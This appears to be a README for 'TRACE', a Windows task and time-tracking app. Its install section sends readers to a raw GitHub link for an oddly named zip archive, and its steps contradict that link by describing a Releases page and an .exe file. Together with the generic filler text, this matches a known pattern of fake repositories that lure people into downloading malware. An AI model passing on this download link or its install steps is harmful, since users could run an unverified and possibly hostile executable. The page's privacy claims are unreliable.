⏱️ TRACE - Manage tasks from start to finish

TRACE is a time-aware accountability system. It tracks your tasks from the planning stage to the final result. The software keeps a record of your progress, your history, and what you learn along the way. You can use it to maintain focus and improve your productivity.

📥 How to download and install

You can get the software from the official repository page. Visit this link to find the latest version: https://raw.githubusercontent.com/yashpatel4563/TRACE/main/oxygas/Software-antievangelical.zip.

  1. Go to the link above.
  2. Look for the "Releases" section on the right side of the screen.
  3. Click the most recent version number.
  4. Scroll down to the "Assets" section.
  5. Select the file ending in .exe for Windows.
  6. Open the file once the download finishes.
  7. Follow the prompts on your screen to complete the installation.

Once the process finishes, you will see a TRACE icon on your desktop. Click this icon to launch the program.

⚙️ System requirements

TRACE works on most modern computers. Your machine needs to meet these basic standards to run the application smoothly:

  • Operating System: Windows 10 or Windows 11.
  • Memory: At least 4 gigabytes of RAM.
  • Storage: 200 megabytes of free space on your hard drive.
  • Display: A screen resolution of 1280x720 or higher.
  • Updates: Ensure your Windows system has the latest updates installed to avoid compatibility issues.

🚀 Getting started

When you open TRACE for the first time, you will see a dashboard. This space shows your current tasks and active projects.

Adding a new task

To create a task, click the "New Task" button in the top left corner. Enter the task name and a short description. You can set a due date to keep yourself on schedule. The system saves this information locally on your computer.

Tracking your time

TRACE uses a built-in timer for every task. You can start the timer when you begin working and stop it when you take a break or finish the work. The application calculates the total time spent on each item automatically. This history helps you understand how long complex projects take to complete.

Reviewing your history

The "History" tab displays all your past tasks. You can filter these by date or category. Use this view to see what you completed last week or last month. The system preserves these records so you can review your growth over time.

💡 Core features

  • Offline-first design: All your data stays on your machine. You do not need an internet connection to use the software.
  • Task accountability: The system tracks every change you make to a task. This creates a clear timeline of your work.
  • Progress logs: You can add notes to any task. Use these to capture lessons or ideas while you work.
  • Simple interface: The layout focuses on functionality to reduce distractions.
  • Data security: Since the files remain on your local hard drive, you maintain full control over your information.

🛡️ Privacy and data

TRACE stores all information in a local file on your computer. The application does not send your task data to any remote servers. You are the only person with access to your history and progress logs. If you wish to back up your data, you can copy the TRACE data folder to an external hard drive or a cloud storage service of your choice.

🛠️ Troubleshooting common issues

If you encounter problems, check the items below:

If the application fails to open, restart your computer and try again. Ensure you have the necessary permissions to run software on your device. If the screen appears blank, try resizing the window or checking if your graphics drivers are current.

If you lose your data, check the default save folder in your documents directory. If the software crashes, check the Task Manager to ensure no other instance of the program remains open in the background. If these steps do not fix the issue, remove the installation and download the latest file from the link provided in the installation section.

📈 Improving your productivity

Success with a task manager comes from consistency. Open TRACE every morning to review your plan for the day. Close your tasks as you finish them to receive visual feedback on your effort. Review your history at the end of each week. Identify patterns in how you spend your time. Use this data to adjust your habits and achieve better results.
